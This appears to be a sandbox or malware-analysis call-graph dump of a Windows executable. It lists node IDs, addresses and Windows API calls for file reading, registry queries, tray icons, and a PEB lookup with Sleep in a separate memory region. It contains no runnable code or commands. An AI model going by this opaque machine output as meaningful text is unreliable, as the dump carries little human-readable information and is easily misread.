98466->98467 98467->98465 98469 630c5e __setmbcp 98468->98469 98470 630c82 98469->98470 98471 630c6b 98469->98471 98472 630d0d 98470->98472 98474 630c92 98470->98474 98520 628d34 58 API calls __getptd_noexit 98471->98520 98525 628d34 58 API calls __getptd_noexit 98472->98525 98477 630cb0 98474->98477 98478 630cba 98474->98478 98476 630c70 98521 628d68 58 API calls __getptd_noexit 98476->98521 98522 628d34 58 API calls __getptd_noexit 98477->98522 98496 62d446 98478->98496 98479 630cb5 98526 628d68 58 API calls __getptd_noexit 98479->98526 98484 630cc0 98486 630cd3 98484->98486 98487 630cde 98484->98487 98485 630d19 98527 628ff6 9 API calls wcstoxq 98485->98527 98505 630d2d 98486->98505 98523 628d68 58 API calls __getptd_noexit 98487->98523 98490 630c77 __setmbcp 98490->98459 98492 630cd9 98524 630d05 LeaveCriticalSection __unlock_fhandle 98492->98524 98494->98451 98495->98448 98497 62d452 __setmbcp 98496->98497 98498 62d4a1 EnterCriticalSection 98497->98498 98499 629e4b __lock 58 API calls 98497->98499 98500 62d4c7 __setmbcp 98498->98500 98501 62d477 98499->98501 98500->98484 98502 62d48f 98501->98502 98528 62a06b InitializeCriticalSectionAndSpinCount 98501->98528 98529 62d4cb LeaveCriticalSection _doexit 98502->98529 98530 62d703 98505->98530 98507 630d91 98543 62d67d 59 API calls 2 library calls 98507->98543 98509 630d3b 98509->98507 98510 630d6f 98509->98510 98513 62d703 __commit 58 API calls 98509->98513 98510->98507 98511 62d703 __commit 58 API calls 98510->98511 98514 630d7b FindCloseChangeNotification 98511->98514 98512 630d99 98519 630dbb 98512->98519 98544 628d47 58 API calls 3 library calls 98512->98544 98515 630d66 98513->98515 98514->98507 98516 630d87 GetLastError 98514->98516 98518 62d703 __commit 58 API calls 98515->98518 98516->98507 98518->98510 98519->98492 98520->98476 98521->98490 98522->98479 98523->98492 98524->98490 98525->98479 98526->98485 98527->98490 98528->98502 98529->98498 98531 62d723 98530->98531 98532 62d70e 98530->98532 98535 628d34 __commit 58 API calls 98531->98535 98537 62d748 98531->98537 98533 628d34 __commit 58 API calls 98532->98533 98534 62d713 98533->98534 98536 628d68 wcstoxq 58 API calls 98534->98536 98538 62d752 98535->98538 98539 62d71b 98536->98539 98537->98509 98540 628d68 wcstoxq 58 API calls 98538->98540 98539->98509 98541 62d75a 98540->98541 98542 628ff6 wcstoxq 9 API calls 98541->98542 98542->98539 98543->98512 98544->98519 98607 631b90 98545->98607 98548 6048f7 98613 607eec 98548->98613 98549 6048da 98550 607d2c 59 API calls 98549->98550 98552 6048e6 98550->98552 98609 607886 98552->98609 98555 6209d5 98556 631b90 __write_nolock 98555->98556 98557 6209e2 GetLongPathNameW 98556->98557 98558 607d2c 59 API calls 98557->98558 98559 60741d 98558->98559 98560 60716b 98559->98560 98561 6077c7 59 API calls 98560->98561 98562 60717d 98561->98562 98563 6048ae 60 API calls 98562->98563 98564 607188 98563->98564 98565 607193 98564->98565 98566 63ecae 98564->98566 98567 603f84 59 API calls 98565->98567 98570 63ecc8 98566->98570 98627 607a68 61 API calls 98566->98627 98569 60719f 98567->98569 98621 6034c2 98569->98621 98572 6071b2 Mailbox 98572->97473 98574 604f3d 136 API calls 98573->98574 98575 6069ef 98574->98575 98576 63e45a 98575->98576 98578 604f3d 136 API calls 98575->98578 98577 6697e5 122 API calls 98576->98577 98580 63e46f 98577->98580 98579 606a03 98578->98579 98579->98576 98581 606a0b 98579->98581 98582 63e473 98580->98582 98583 63e490 98580->98583 98584 606a17 98581->98584 98585 63e47b 98581->98585 98586 604faa 84 API calls 98582->98586 98587 620ff6 Mailbox 59 API calls 98583->98587 98628 606bec 98584->98628 98743 664534 90 API calls _wprintf 98585->98743 98586->98585 98606 63e4d5 Mailbox 98587->98606 98591 63e489 98591->98583 98592 63e689 98593 622f95 _free 58 API calls 98592->98593 98594 63e691 98593->98594 98595 604faa 84 API calls 98594->98595 98600 63e69a 98595->98600 98599 622f95 _free 58 API calls 98599->98600 98600->98599 98601 604faa 84 API calls 98600->98601 98745 65fcb1 89 API calls 4 library calls 98600->98745 98601->98600 98603 607f41 59 API calls 98603->98606 98606->98592 98606->98600 98606->98603 98720 65fc4d 98606->98720 98723 667621 98606->98723 98729 60766f 98606->98729 98737 6074bd 98606->98737 98744 65fb6e 61 API calls 2 library calls 98606->98744 98608 6048bb GetFullPathNameW 98607->98608 98608->98548 98608->98549 98610 607894 98609->98610 98617 607e8c 98610->98617 98612 6048f2 98612->98555 98614 607f06 98613->98614 98616 607ef9 98613->98616 98615 620ff6 Mailbox 59 API calls 98614->98615 98615->98616 98616->98552 98618 607e9a 98617->98618 98620 607ea3 _memmove 98617->98620 98619 607faf 59 API calls 98618->98619 98618->98620 98619->98620 98620->98612 98622 6034d4 98621->98622 98626 6034f3 _memmove 98621->98626 98625 620ff6 Mailbox 59 API calls 98622->98625 98623 620ff6 Mailbox 59 API calls 98624 60350a 98623->98624 98624->98572 98625->98626 98626->98623 98627->98566 98629 63e847 98628->98629 98630 606c15 98628->98630 98837 65fcb1 89 API calls 4 library calls 98629->98837 98751 605906 60 API calls Mailbox 98630->98751 98633 63e85a 98838 65fcb1 89 API calls 4 library calls 98633->98838 98634 606c37 98752 605956 98634->98752 98638 606c54 98640 6077c7 59 API calls 98638->98640 98639 63e876 98643 606cc1 98639->98643 98641 606c60 98640->98641 98765 620b9b 60 API calls __write_nolock 98641->98765 98645 63e889 98643->98645 98646 606ccf 98643->98646 98644 606c6c 98647 6077c7 59 API calls 98644->98647 98648 605dcf CloseHandle 98645->98648 98649 6077c7 59 API calls 98646->98649 98650 606c78 98647->98650 98651 63e895 98648->98651 98652 606cd8 98649->98652 98653 6048ae 60 API calls 98650->98653 98654 604f3d 136 API calls 98651->98654 98655 6077c7 59 API calls 98652->98655 98656 606c86 98653->98656 98657 63e8b1 98654->98657 98658 606ce1 98655->98658 98766 6059b0 ReadFile SetFilePointerEx 98656->98766 98660 63e8da 98657->98660 98665 6697e5 122 API calls 98657->98665 98775 6046f9 98658->98775 98839 65fcb1 89 API calls 4 library calls 98660->98839 98662 606cf8 98666 607c8e 59 API calls 98662->98666 98664 606cb2 98767 605c4e 98664->98767 98668 63e8cd 98665->98668 98669 606d09 SetCurrentDirectoryW 98666->98669 98670 63e8f6 98668->98670 98671 63e8d5 98668->98671 98676 606d1c Mailbox 98669->98676 98673 604faa 84 API calls 98670->98673 98672 604faa 84 API calls 98671->98672 98672->98660 98674 63e8fb 98673->98674 98675 620ff6 Mailbox 59 API calls 98674->98675 98682 63e92f 98675->98682 98678 620ff6 Mailbox 59 API calls 98676->98678 98680 606d2f 98678->98680 98679 603bcd 98679->97327 98679->97336 98681 60538e 59 API calls 98680->98681 98690 606d3a Mailbox __NMSG_WRITE 98681->98690 98683 60766f 59 API calls 98682->98683 98715 63e978 Mailbox 98683->98715 98684 606e47 98833 605dcf 98684->98833 98685 63eb69 98842 667581 59 API calls Mailbox 98685->98842 98689 606e6c Mailbox 98746 605934 98689->98746 98690->98684 98703 63ebfa 98690->98703 98706 607f41 59 API calls 98690->98706 98707 63ec02 98690->98707 98826 6059cd 67 API calls _wcscpy 98690->98826 98827 6070bd GetStringTypeW 98690->98827 98828 60702c 60 API calls __wcsnicmp 98690->98828 98829 60710a GetStringTypeW __NMSG_WRITE 98690->98829 98830 62387d GetStringTypeW _iswctype 98690->98830 98831 606a3c 165 API calls 3 library calls 98690->98831 98832 607373 59 API calls Mailbox 98690->98832 98693 63eb8b 98843 66f835 59 API calls 2 library calls 98693->98843 98696 63eb98 98697 622f95 _free 58 API calls 98696->98697 98697->98689 98700 60766f 59 API calls 98700->98715 98845 65fb07 59 API calls 4 library calls 98703->98845 98706->98690 98846 65fcb1 89 API calls 4 library calls 98707->98846 98709 65fc4d 59 API calls 98709->98715 98710 607f41 59 API calls 98710->98715 98712 667621 59 API calls 98712->98715 98714 63ebbb 98844 65fcb1 89 API calls 4 library calls 98714->98844 98715->98685 98715->98700 98715->98709 98715->98710 98715->98712 98715->98714 98840 65fb6e 61 API calls 2 library calls 98715->98840 98841 607373 59 API calls Mailbox 98715->98841 98717 63ebd4 98718 622f95 _free 58 API calls 98717->98718 98719 63e8f1 98718->98719 98719->98689 98721 620ff6 Mailbox 59 API calls 98720->98721 98722 65fc7d _memmove 98721->98722 98722->98606 98724 66762c 98723->98724 98725 620ff6 Mailbox 59 API calls 98724->98725 98726 667643 98725->98726 98727 667652 98726->98727 98728 607f41 59 API calls 98726->98728 98727->98606 98728->98727 98730 60770f 98729->98730 98733 607682 _memmove 98729->98733 98732 620ff6 Mailbox 59 API calls 98730->98732 98731 620ff6 Mailbox 59 API calls 98734 607689 98731->98734 98732->98733 98733->98731 98735 620ff6 Mailbox 59 API calls 98734->98735 98736 6076b2 98734->98736 98735->98736 98736->98606 98738 6074d0 98737->98738 98740 60757e 98737->98740 98739 620ff6 Mailbox 59 API calls 98738->98739 98742 607502 98738->98742 98739->98742 98740->98606 98741 620ff6 59 API calls Mailbox 98741->98742 98742->98740 98742->98741 98743->98591 98744->98606 98745->98600 98747 605dcf CloseHandle 98746->98747 98748 60593c Mailbox 98747->98748 98749 605dcf CloseHandle 98748->98749 98750 60594b 98749->98750 98750->98679 98751->98634 98753 605dcf CloseHandle 98752->98753 98754 605962 98753->98754 98847 605df9 98754->98847 98756 605981 98757 6059a4 98756->98757 98855 605770 98756->98855 98757->98633 98757->98638 98759 605993 98872 6053db SetFilePointerEx SetFilePointerEx 98759->98872 98761 63e030 98873 663696 SetFilePointerEx SetFilePointerEx WriteFile 98761->98873 98762 60599a 98762->98757 98762->98761 98764 63e060 98764->98757 98765->98644 98766->98664 98773 605c68 98767->98773 98768 63e151 98887 605dae SetFilePointerEx 98768->98887 98769 605cef SetFilePointerEx 98886 605dae SetFilePointerEx 98769->98886 98772 63e16b 98773->98768 98773->98769 98774 605cc3 98773->98774 98774->98643 98776 6077c7 59 API calls 98775->98776 98777 60470f 98776->98777 98778 6077c7 59 API calls 98777->98778 98779 604717 98778->98779 98780 6077c7 59 API calls 98779->98780 98781 60471f 98780->98781 98782 6077c7 59 API calls 98781->98782 98783 604727 98782->98783 98784 63d8fb 98783->98784 98785 60475b 98783->98785 98786 6081a7 59 API calls 98784->98786 98787 6079ab 59 API calls 98785->98787 98788 63d904 98786->98788 98789 604769 98787->98789 98790 607eec 59 API calls 98788->98790 98791 607e8c 59 API calls 98789->98791 98794 60479e 98790->98794 98792 604773 98791->98792 98792->98794 98795 6079ab 59 API calls 98792->98795 98793 6047de 98888 6079ab 98793->98888 98794->98793 98797 6047bd 98794->98797 98807 63d924 98794->98807 98798 604794 98795->98798 98801 607b52 59 API calls 98797->98801 98800 607e8c 59 API calls 98798->98800 98799 63d9f4 98803 607d2c 59 API calls 98799->98803 98800->98794 98804 6047c7 98801->98804 98802 6047ef 98805 604801 98802->98805 98808 6081a7 59 API calls 98802->98808 98816 63d9b1 98803->98816 98804->98793 98812 6079ab 59 API calls 98804->98812 98806 604811 98805->98806 98809 6081a7 59 API calls 98805->98809 98811 604818 98806->98811 98813 6081a7 59 API calls 98806->98813 98807->98799 98810 63d9dd 98807->98810 98823 63d95b 98807->98823 98808->98805 98809->98806 98810->98799 98817 63d9c8 98810->98817 98814 60481f Mailbox 98811->98814 98815 6081a7 59 API calls 98811->98815 98812->98793 98813->98811 98814->98662 98815->98814 98816->98793 98821 607b52 59 API calls 98816->98821 98901 607a84 59 API calls 2 library calls 98816->98901 98820 607d2c 59 API calls 98817->98820 98818 63d9b9 98819 607d2c 59 API calls 98818->98819 98819->98816 98820->98816 98821->98816 98823->98818 98824 63d9a4 98823->98824 98825 607d2c 59 API calls 98824->98825 98825->98816 98826->98690 98827->98690 98828->98690 98829->98690 98830->98690 98831->98690 98832->98690 98837->98633 98838->98639 98839->98719 98840->98715 98841->98715 98842->98693 98843->98696 98844->98717 98845->98707 98848 63e181 98847->98848 98849 605e12 CreateFileW 98847->98849 98850 63e187 CreateFileW 98848->98850 98851 605e34 98848->98851 98849->98851 98850->98851 98852 63e1ad 98850->98852 98851->98756 98853 605c4e 2 API calls 98852->98853 98854 63e1b8 98853->98854 98854->98851 98856 60578b 98855->98856 98857 63dfce 98855->98857 98858 605c4e 2 API calls 98856->98858 98871 60581a 98856->98871 98857->98871 98880 605e3f 98857->98880 98859 6057ad 98858->98859 98860 60538e 59 API calls 98859->98860 98862 6057b7 98860->98862 98862->98857 98863 6057c4 98862->98863 98864 620ff6 Mailbox 59 API calls 98863->98864 98865 6057cf 98864->98865 98866 60538e 59 API calls 98865->98866 98867 6057da 98866->98867 98874 605d20 98867->98874 98870 605c4e 2 API calls 98870->98871 98871->98759 98872->98762 98873->98764 98875 605d93 98874->98875 98879 605d2e 98874->98879 98885 605dae SetFilePointerEx 98875->98885 98877 605807 98877->98870 98878 605d66 ReadFile 98878->98877 98878->98879 98879->98877 98879->98878 98881 605c4e 2 API calls 98880->98881 98882 605e60 98881->98882 98883 605c4e 2 API calls 98882->98883 98884 605e74 98883->98884 98884->98871 98885->98879 98886->98774 98887->98772 98889 607a17 98888->98889 98890 6079ba 98888->98890 98891 607e8c 59 API calls 98889->98891 98890->98889 98892 6079c5 98890->98892 98898 6079e8 _memmove 98891->98898 98893 6079e0 98892->98893 98894 63ef32 98892->98894 98902 608087 59 API calls Mailbox 98893->98902 98903 608189 98894->98903 98897 63ef3c 98899 620ff6 Mailbox 59 API calls 98897->98899 98898->98802 98900 63ef5c 98899->98900 98901->98816 98902->98898 98904 620ff6 Mailbox 59 API calls 98903->98904 98905 608193 98904->98905 98905->98897 98906->97480 98908 606ef5 98907->98908 98909 607009 98907->98909 98908->98909 98910 620ff6 Mailbox 59 API calls 98908->98910 98909->97488 98912 606f1c 98910->98912 98911 620ff6 Mailbox 59 API calls 98913 606f91 98911->98913 98912->98911 98913->98909 98916 6074bd 59 API calls 98913->98916 98917 60766f 59 API calls 98913->98917 98920 6063a0 98913->98920 98946 656ac9 59 API calls Mailbox 98913->98946 98916->98913 98917->98913 98918->97491 98919->97493 98947 607b76 98920->98947 98922 6065ca 98923 60766f 59 API calls 98922->98923 98924 6065e4 Mailbox 98923->98924 98924->98913 98927 63e41f 98956 65fdba 91 API calls 4 library calls 98927->98956 98928 6068f9 98928->98924 98957 65fdba 91 API calls 4 library calls 98928->98957 98929 60766f 59 API calls 98941 6063c5 98929->98941 98933 607eec 59 API calls 98933->98941 98934 63e42d 98937 63e3bb 98938 608189 59 API calls 98937->98938 98940 63e3c6 98938->98940 98941->98922 98941->98927 98941->98928 98941->98929 98941->98933 98941->98937 98942 607faf 59 API calls 98941->98942 98945 63e3eb _memmove 98941->98945 98952 6060cc 60 API calls 98941->98952 98953 605ea1 59 API calls Mailbox 98941->98953 98954 605fd2 60 API calls 98941->98954 98955 607a84 59 API calls 2 library calls 98941->98955 98943 60659b CharUpperBuffW 98942->98943 98943->98941 98945->98927 98945->98928 98946->98913 98948 620ff6 Mailbox 59 API calls 98947->98948 98949 607b9b 98948->98949 98950 608189 59 API calls 98949->98950 98951 607baa 98950->98951 98951->98941 98952->98941 98953->98941 98954->98941 98955->98941 98956->98934 98957->98924 98958->97506 98959->97507 98961 604227 98960->98961 98962 63d638 98960->98962 98962->98961 99049->97535 99050->97535 99051->97535 99508 640226 99517 60ade2 Mailbox 99508->99517 99510 640c86 99682 6566f4 99510->99682 99512 640c8f 99514 6400e0 VariantClear 99514->99517 99515 60b6c1 99681 66a0b5 89 API calls 4 library calls 99515->99681 99517->99510 99517->99512 99517->99514 99517->99515 99524 66d2e5 99517->99524 99571 612123 99517->99571 99611 674583 99517->99611 99620 66d2e6 99517->99620 99667 67e237 99517->99667 99670 67474d 99517->99670 99679 609df0 59 API calls Mailbox 99517->99679 99680 657405 59 API calls 99517->99680 99525 66d310 99524->99525 99526 66d305 99524->99526 99527 66d3ea Mailbox 99525->99527 99530 6077c7 59 API calls 99525->99530 99685 609c9c 59 API calls 99526->99685 99529 620ff6 Mailbox 59 API calls 99527->99529 99568 66d3f3 Mailbox 99527->99568 99531 66d433 99529->99531 99533 66d334 99530->99533 99532 66d43f 99531->99532 99688 605906 60 API calls Mailbox 99531->99688 99536 609997 84 API calls 99532->99536 99535 6077c7 59 API calls 99533->99535 99537 66d33d 99535->99537 99538 66d457 99536->99538 99539 609997 84 API calls 99537->99539 99540 605956 67 API calls 99538->99540 99541 66d349 99539->99541 99542 66d466 99540->99542 99543 6046f9 59 API calls 99541->99543 99544 66d49e 99542->99544 99545 66d46a GetLastError 99542->99545 99546 66d35e 99543->99546 99549 66d500 99544->99549 99550 66d4c9 99544->99550 99547 66d483 99545->99547 99548 607c8e 59 API calls 99546->99548 99547->99568 99689 605a1a CloseHandle 99547->99689 99551 66d391 99548->99551 99552 620ff6 Mailbox 59 API calls 99549->99552 99553 620ff6 Mailbox 59 API calls 99550->99553 99554 66d3e3 99551->99554 99559 663e73 3 API calls 99551->99559 99555 66d505 99552->99555 99556 66d4ce 99553->99556 99687 609c9c 59 API calls 99554->99687 99563 6077c7 59 API calls 99555->99563 99555->99568 99561 66d4df 99556->99561 99564 6077c7 59 API calls 99556->99564 99560 66d3a1 99559->99560 99560->99554 99562 66d3a5 99560->99562 99690 66f835 59 API calls 2 library calls 99561->99690 99565 607f41 59 API calls 99562->99565 99563->99568 99564->99561 99567 66d3b2 99565->99567 99686 663c66 63 API calls Mailbox 99567->99686 99568->99517 99570 66d3bb Mailbox 99570->99554 99691 609bf8 99571->99691 99574 620ff6 Mailbox 59 API calls 99576 612154 99574->99576 99579 612164 99576->99579 99719 605906 60 API calls Mailbox 99576->99719 99577 612189 99586 612196 99577->99586 99724 609c9c 59 API calls 99577->99724 99578 6469af 99578->99577 99723 66f7df 59 API calls 99578->99723 99581 609997 84 API calls 99579->99581 99583 612172 99581->99583 99585 605956 67 API calls 99583->99585 99584 6469f7 99584->99586 99587 6469ff 99584->99587 99588 612181 99585->99588 99590 605e3f 2 API calls 99586->99590 99725 609c9c 59 API calls 99587->99725 99588->99577 99588->99578 99722 605a1a CloseHandle 99588->99722 99592 61219d 99590->99592 99593 646a11 99592->99593 99594 6121b7 99592->99594 99596 620ff6 Mailbox 59 API calls 99593->99596 99595 6077c7 59 API calls 99594->99595 99597 6121bf 99595->99597 99598 646a17 99596->99598 99704 6056d2 99597->99704 99604 646a2b 99598->99604 99726 6059b0 ReadFile SetFilePointerEx 99598->99726 99601 6121ce 99605 646a2f _memmove 99601->99605 99720 609b9c 59 API calls Mailbox 99601->99720 99604->99605 99727 66794e 59 API calls 2 library calls 99604->99727 99606 6121e2 Mailbox 99607 61221c 99606->99607 99608 605dcf CloseHandle 99606->99608 99607->99517 99609 612210 99608->99609 99609->99607 99721 605a1a CloseHandle 99609->99721 99612 620ff6 Mailbox 59 API calls 99611->99612 99613 674594 99612->99613 99614 60538e 59 API calls 99613->99614 99615 67459e 99614->99615 99616 609997 84 API calls 99615->99616 99617 6745b5 GetEnvironmentVariableW 99616->99617 99751 667738 59 API calls Mailbox 99617->99751 99619 6745d2 99619->99517 99621 66d310 99620->99621 99622 66d305 99620->99622 99623 66d3ea Mailbox 99621->99623 99626 6077c7 59 API calls 99621->99626 99752 609c9c 59 API calls 99622->99752 99625 620ff6 Mailbox 59 API calls 99623->99625 99664 66d3f3 Mailbox 99623->99664 99627 66d433 99625->99627 99629 66d334 99626->99629 99628 66d43f 99627->99628 99755 605906 60 API calls Mailbox 99627->99755 99632 609997 84 API calls 99628->99632 99631 6077c7 59 API calls 99629->99631 99633 66d33d 99631->99633 99634 66d457 99632->99634 99635 609997 84 API calls 99633->99635 99636 605956 67 API calls 99634->99636 99637 66d349 99635->99637 99638 66d466 99636->99638 99639 6046f9 59 API calls 99637->99639 99640 66d49e 99638->99640 99641 66d46a GetLastError 99638->99641 99642 66d35e 99639->99642 99645 66d500 99640->99645 99646 66d4c9 99640->99646 99643 66d483 99641->99643 99644 607c8e 59 API calls 99642->99644 99643->99664 99756 605a1a CloseHandle 99643->99756 99647 66d391 99644->99647 99648 620ff6 Mailbox 59 API calls 99645->99648 99649 620ff6 Mailbox 59 API calls 99646->99649 99650 66d3e3 99647->99650 99655 663e73 3 API calls 99647->99655 99651 66d505 99648->99651 99652 66d4ce 99649->99652 99754 609c9c 59 API calls 99650->99754 99659 6077c7 59 API calls 99651->99659 99651->99664 99657 66d4df 99652->99657 99660 6077c7 59 API calls 99652->99660 99656 66d3a1 99655->99656 99656->99650 99658 66d3a5 99656->99658 99757 66f835 59 API calls 2 library calls 99657->99757 99661 607f41 59 API calls 99658->99661 99659->99664 99660->99657 99663 66d3b2 99661->99663 99753 663c66 63 API calls Mailbox 99663->99753 99664->99517 99666 66d3bb Mailbox 99666->99650 99668 67cdf1 130 API calls 99667->99668 99669 67e247 99668->99669 99669->99517 99671 609997 84 API calls 99670->99671 99672 674787 99671->99672 99673 6063a0 94 API calls 99672->99673 99674 674797 99673->99674 99675 6747bc 99674->99675 99676 60a000 341 API calls 99674->99676 99677 609bf8 59 API calls 99675->99677 99678 6747c0 99675->99678 99676->99675 99677->99678 99678->99517 99679->99517 99680->99517 99681->99510 99758 656636 99682->99758 99684 656702 99684->99512 99685->99525 99686->99570 99687->99527 99688->99532 99689->99568 99690->99568 99692 609c08 99691->99692 99693 63fbff 99691->99693 99698 620ff6 Mailbox 59 API calls 99692->99698 99694 63fc10 99693->99694 99695 607d2c 59 API calls 99693->99695 99696 607eec 59 API calls 99694->99696 99695->99694 99697 63fc1a 99696->99697 99701 609c34 99697->99701 99702 6077c7 59 API calls 99697->99702 99699 609c1b 99698->99699 99699->99697 99700 609c26 99699->99700 99700->99701 99703 607f41 59 API calls 99700->99703 99701->99574 99701->99578 99702->99701 99703->99701 99705 605702 99704->99705 99706 6056dd 99704->99706 99707 607eec 59 API calls 99705->99707 99706->99705 99711 6056ec 99706->99711 99710 66349a 99707->99710 99708 6634c9 99708->99601 99710->99708 99728 663436 ReadFile SetFilePointerEx 99710->99728 99729 607a84 59 API calls 2 library calls 99710->99729 99730 605c18 99711->99730 99718 6635d8 Mailbox 99718->99601 99719->99579 99720->99606 99721->99607 99722->99578 99723->99578 99724->99584 99725->99592 99726->99604 99727->99605 99728->99710 99729->99710 99731 620ff6 Mailbox 59 API calls 99730->99731 99732 605c2b 99731->99732 99733 620ff6 Mailbox 59 API calls 99732->99733 99734 605c37 99733->99734 99735 605632 99734->99735 99742 605a2f 99735->99742 99737 605674 99737->99718 99741 60793a 61 API calls Mailbox 99737->99741 99738 605d20 2 API calls 99739 605643 99738->99739 99739->99737 99739->99738 99749 605bda 59 API calls 2 library calls 99739->99749 99741->99718 99743 605a40 99742->99743 99744 63e065 99742->99744 99743->99739 99750 656443 59 API calls Mailbox 99744->99750 99746 63e06f 99747 620ff6 Mailbox 59 API calls 99746->99747 99748 63e07b 99747->99748 99749->99739 99750->99746 99751->99619 99752->99621 99753->99666 99754->99623 99755->99628 99756->99664 99757->99664 99759 656641 99758->99759 99760 65665e 99758->99760 99759->99760 99762 656621 59 API calls Mailbox 99759->99762 99760->99684 99762->99759 99763 603633 99764 60366a 99763->99764 99765 6036e7 99764->99765 99766 603688 99764->99766 99802 6036e5 99764->99802 99768 6036ed 99765->99768 99769 63d31c 99765->99769 99770 603695 99766->99770 99771 60375d PostQuitMessage 99766->99771 99767 6036ca DefWindowProcW 99805 6036d8 99767->99805 99775 6036f2 99768->99775 99776 603715 SetTimer RegisterWindowMessageW 99768->99776 99813 6111d0 10 API calls Mailbox 99769->99813 99772 6036a0 99770->99772 99773 63d38f 99770->99773 99771->99805 99777 603767 99772->99777 99778 6036a8 99772->99778 99817 662a16 71 API calls _memset 99773->99817 99782 6036f9 KillTimer 99775->99782 99783 63d2bf 99775->99783 99779 60373e CreatePopupMenu 99776->99779 99776->99805 99811 604531 64 API calls _memset 99777->99811 99784 6036b3 99778->99784 99785 63d374 99778->99785 99779->99805 99781 63d343 99814 6111f3 341 API calls Mailbox 99781->99814 99808 6044cb Shell_NotifyIconW _memset 99782->99808 99789 63d2c4 99783->99789 99790 63d2f8 MoveWindow 99783->99790 99792 60374b 99784->99792 99793 6036be 99784->99793 99785->99767 99816 65817e 59 API calls Mailbox 99785->99816 99786 63d3a1 99786->99767 99786->99805 99795 63d2e7 SetFocus 99789->99795 99796 63d2c8 99789->99796 99790->99805 99810 6045df 81 API calls _memset 99792->99810 99793->99767 99815 6044cb Shell_NotifyIconW _memset 99793->99815 99794 60375b 99794->99805 99795->99805 99796->99793 99799 63d2d1 99796->99799 99797 60370c 99809 603114 DeleteObject DestroyWindow Mailbox 99797->99809 99812 6111d0 10 API calls Mailbox 99799->99812 99802->99767 99806 63d368 99807 6043db 68 API calls 99806->99807 99807->99802 99808->99797 99809->99805 99810->99794 99811->99794 99812->99805 99813->99781 99814->99793 99815->99806 99816->99802 99817->99786 99818 39423b0 99832 3940000 99818->99832 99820 3942487 99835 39422a0 99820->99835 99838 39434b0 GetPEB 99832->99838 99834 394068b 99834->99820 99836 39422a9 Sleep 99835->99836 99837 39422b7 99836->99837 99839 39434da 99838->99839 99839->99834 99840 601055 99845 602649 99840->99845 99843 622f80 __cinit 67 API calls 99844 601064 99843->99844 99846 6077c7 59 API calls 99845->99846 99847 6026b7 99846->99847 99852 603582 99847->99852 99849 602754 99851 60105a 99849->99851 99855 603416 59 API calls 2 library calls 99849->99855 99851->99843 99856 6035b0 99852->99856 99855->99849 99857 6035bd 99856->99857 99858 6035a1 99856->99858 99857->99858 99859 6035c4 RegOpenKeyExW 99857->99859 99858->99849 99859->99858 99860 6035de RegQueryValueExW 99859->99860 99861 603614 RegCloseKey 99860->99861 99862 6035ff 99860->99862 99861->99858 99862->99861 99863 63ff06 99864 63ff10 99863->99864 99869 60ac90 Mailbox _memmove 99863->99869 99964 608e34 59 API calls Mailbox 99864->99964 99867 60b685 99969 66a0b5 89 API calls 4 library calls 99867->99969 99869->99867 99876 60a1b7 99869->99876 99879 60a097 Mailbox 99869->99879 99884 607f41 59 API calls 99869->99884 99893 67bf80 341 API calls 99869->99893 99894 6566f4 Mailbox 59 API calls 99869->99894 99896 60b416 99869->99896 99897 60a000 341 API calls 99869->99897 99899 640c94 99869->99899 99901 640ca2 99869->99901 99904 60b37c 99869->99904 99905 620ff6 59 API calls Mailbox 99869->99905 99912 60ade2 Mailbox 99869->99912 99920 67c5f4 99869->99920 99952 667be0 99869->99952 99965 657405 59 API calls 99869->99965 99966 67c4a7 85 API calls 2 library calls 99869->99966 99870 620ff6 59 API calls Mailbox 99870->99879 99873 60b5da 99974 66a0b5 89 API calls 4 library calls 99873->99974 99875 60b5d5 99877 6081a7 59 API calls 99875->99877 99877->99876 99878 64047f 99968 66a0b5 89 API calls 4 library calls 99878->99968 99879->99870 99879->99873 99879->99875 99879->99876 99879->99878 99881 6081a7 59 API calls 99879->99881 99883 6077c7 59 API calls 99879->99883 99887 657405 59 API calls 99879->99887 99890 640e00 99879->99890 99892 622f80 67 API calls __cinit 99879->99892 99895 60a6ba 99879->99895 99958 60ca20 341 API calls 2 library calls 99879->99958 99959 60ba60 60 API calls Mailbox 99879->99959 99881->99879 99883->99879 99884->99869 99886 64048e 99887->99879 99889 6566f4 Mailbox 59 API calls 99889->99876 99973 66a0b5 89 API calls 4 library calls 99890->99973 99892->99879 99893->99869 99894->99869 99972 66a0b5 89 API calls 4 library calls 99895->99972 99963 60f803 341 API calls 99896->99963 99897->99869 99970 609df0 59 API calls Mailbox 99899->99970 99971 66a0b5 89 API calls 4 library calls 99901->99971 99903 640c86 99903->99876 99903->99889 99961 609e9c 60 API calls Mailbox 99904->99961 99905->99869 99907 60b38d 99962 609e9c 60 API calls Mailbox 99907->99962 99912->99867 99912->99876 99912->99903 99913 6400e0 VariantClear 99912->99913 99914 67e237 130 API calls 99912->99914 99915 66d2e6 101 API calls 99912->99915 99916 612123 95 API calls 99912->99916 99917 66d2e5 101 API calls 99912->99917 99918 674583 85 API calls 99912->99918 99919 67474d 341 API calls 99912->99919 99960 609df0 59 API calls Mailbox 99912->99960 99967 657405 59 API calls 99912->99967 99913->99912 99914->99912 99915->99912 99916->99912 99917->99912 99918->99912 99919->99912 99921 6077c7 59 API calls 99920->99921 99922 67c608 99921->99922 99923 6077c7 59 API calls 99922->99923 99924 67c610 99923->99924 99925 6077c7 59 API calls 99924->99925 99926 67c618 99925->99926 99927 609997 84 API calls 99926->99927 99951 67c626 99927->99951 99928 607a84 59 API calls 99928->99951 99929 607d2c 59 API calls 99929->99951 99930 67c80f 99935 67c83c Mailbox 99930->99935 99977 609b9c 59 API calls Mailbox 99930->99977 99932 67c7f6 99934 607e0b 59 API calls 99932->99934 99933 6081a7 59 API calls 99933->99951 99937 67c803 99934->99937 99935->99869 99936 67c811 99938 607e0b 59 API calls 99936->99938 99940 607c8e 59 API calls 99937->99940 99941 67c820 99938->99941 99939 607faf 59 API calls 99943 67c6bd CharUpperBuffW 99939->99943 99940->99930 99944 607c8e 59 API calls 99941->99944 99942 607faf 59 API calls 99945 67c77d CharUpperBuffW 99942->99945 99975 60859a 68 API calls 99943->99975 99944->99930 99976 60c707 69 API calls 2 library calls 99945->99976 99948 609997 84 API calls 99948->99951 99949 607e0b 59 API calls 99949->99951 99950 607c8e 59 API calls 99950->99951 99951->99928 99951->99929 99951->99930 99951->99932 99951->99933 99951->99935 99951->99936 99951->99939 99951->99942 99951->99948 99951->99949 99951->99950 99953 667bec 99952->99953 99954 620ff6 Mailbox 59 API calls 99953->99954 99955 667bfa 99954->99955 99956 667c08 99955->99956 99957 6077c7 59 API calls 99955->99957 99956->99869 99957->99956 99958->99879 99959->99879 99960->99912 99961->99907 99962->99896 99963->99867 99964->99869 99965->99869 99966->99869 99967->99912 99968->99886 99969->99903 